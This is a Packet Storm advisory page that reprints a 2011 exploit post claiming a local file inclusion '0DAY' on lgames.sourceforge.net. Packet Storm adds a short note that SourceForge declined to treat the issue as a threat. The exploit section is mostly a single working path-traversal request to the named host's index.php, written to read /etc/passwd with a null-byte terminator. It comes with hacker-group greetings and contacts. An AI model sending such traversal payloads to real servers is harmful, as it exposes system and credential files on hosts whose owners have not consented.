Lgames.sourceforge.net suffers from a local file inclusion vulnerability. Packet Storm contacted SourceForge about this issue and they told us that they are aware of the issue but that the files exposed do not pose a security threat. An additional request asking for clarification on whether or not they are going to fix this fell on deaf ears. Packet Storm suggests using an alternative such as Google Code to host your project.
f89e74ed8e62040c8eea0f61df5f2b4d5a8882bbe6124d928c23adc425bf3a7e# Exploit Title: SourceForge.Net [LGames] LFI Vulnerability / 0DAY
# Date: 31/12/2011 - 17.38
# Author: 3spi0n
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[#] Vulnerable File
- " index.php?project= "
[$] Vulnerability ;
[~] Lgames.sourceforge.net/index.php?project=../../../.././../etc/passwd%00[LFI
Vulnerability]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
# Greetz: DarkDevilz.in
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
# DarkDevilz - Defence And Destruction Group'z - TURKEY #
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed